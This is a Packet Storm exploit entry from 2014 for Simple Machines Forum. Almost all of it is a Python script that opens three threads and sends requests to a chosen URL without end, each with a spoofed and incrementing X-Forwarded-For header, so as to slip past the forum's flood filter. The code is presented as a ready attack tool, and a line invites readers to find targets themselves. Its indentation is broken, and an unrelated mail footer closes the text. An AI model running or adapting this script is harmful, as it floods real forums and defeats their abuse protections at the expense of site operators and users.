SMF Flood Filter Issue

2014-08-23T00:00:00
ID PACKETSTORM:127984
Type packetstorm
Reporter Daniel Godoy
Modified 2014-08-23T00:00:00

Description

                                        
                                            `# Exploit Title: SMF Incorrect Flood Filter Headers# Date: 21/08/2014#  
Author: Daniel Godoy# Author Mail:  
DanielGodoy[at]GobiernoFederal[dot]com# Author Web:  
www.delincuentedigital.com.ar# Software: Simple Machine Forum #  
http://www.simplemachines.org# Tested on: Linux# DORK: Try yourself ;)  
  
* #!/usr/bin/python  
* # RemoteExecution  
* #Autor: Daniel Godoy A.K.A hielasangre  
*   
* import sys, threading, time, urllib2,re  
* print "Ingrese URL: "  
* url = raw_input()  
* a = b = c = d = 1  
* count = 0  
* class SMFPwner(threading.Thread):  
* def __init__(self, num):  
* threading.Thread.__init__(self)  
* self.num = num   
* def run(self):  
* while 1:  
* global a,b,c,d,count, url  
* data = ""  
* while 1:  
* while 1:  
* if d!=250:  
* d+=1  
* else:  
* if c!= 250:  
* c+=2  
* d=0  
* else:  
* if b!=250:  
* c=0  
* d=0  
* b+=1  
* else:  
* a+=1  
* b=0  
* c=0  
* d=0  
*   
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)  
* headers = { 'X-Forwarded-For' : head }  
*   
req = urllib2.Request(url, data, headers)  
* f = urllib2.urlopen(req)  
* count += 1  
* print "[ Visitando => " + url + " Por  
" + str(count) +" vez ]"  
* for i in range(3):   
* ta = SMFPwner(i)  
* ta.start()  
  
http://pastebin.com/TiZc0T05  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`